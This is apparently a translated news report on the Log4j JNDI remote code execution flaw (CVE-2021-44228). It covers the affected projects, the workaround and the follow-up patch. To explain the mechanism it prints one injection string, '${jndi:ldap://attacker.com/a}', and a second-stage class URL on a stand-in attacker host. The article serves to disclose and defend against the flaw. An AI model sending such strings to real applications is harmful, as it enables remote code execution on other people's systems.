In Apache Log4j, a popular framework for organizing logging in Java applications, a critical vulnerability has been identified that allows arbitrary code to be executed when a specially formatted value in the “{jndi:URL}” format is written to the log. The attack can be carried out on Java applications that log values received from external sources, for example, when displaying problematic values in error messages.
It is noted that almost all projects using frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected by the problem, including Steam, Apple iCloud, Minecraft clients and servers. It is expected that the vulnerability could lead to a wave of massive attacks on corporate applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which, according to a rough estimate, is used in web applications by 65% of Fortune 100 companies. Including attempts to scan the network for vulnerable systems.
The problem is aggravated by the fact that a working exploit has already been published, but fixes for the stable branches have not yet been compiled. The CVE identifier has not yet been assigned. The fix is only included in the log4j-2.15.0-rc1 test branch. As a workaround for blocking the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.
The problem was caused by the fact that log4j supports processing special masks “{}” in lines output to the log, in which JNDI (Java Naming and Directory Interface) queries could be executed. The attack boils down to passing a string with the substitution “${jndi:ldap://attacker.com/a}”, upon processing which log4j will send an LDAP request for the path to the Java class to the attacker.com server. The path returned by the attacker's server (for example, http://second-stage.attacker.com/Exploit.class) will be loaded and executed in the context of the current process, which allows the attacker to execute arbitrary code on the system with the rights of the current application.
Addendum 1: The vulnerability has been assigned the identifier CVE-2021-44228.
Addendum 2: A way to bypass the protection added by release log4j-2.15.0-rc1 has been identified. A new update, log4j-2.15.0-rc2, has been proposed with more complete protection against the vulnerability. The code highlights the change associated with the absence of an abnormal termination in the case of using an incorrectly formatted JNDI URL.
Source: opennet.ru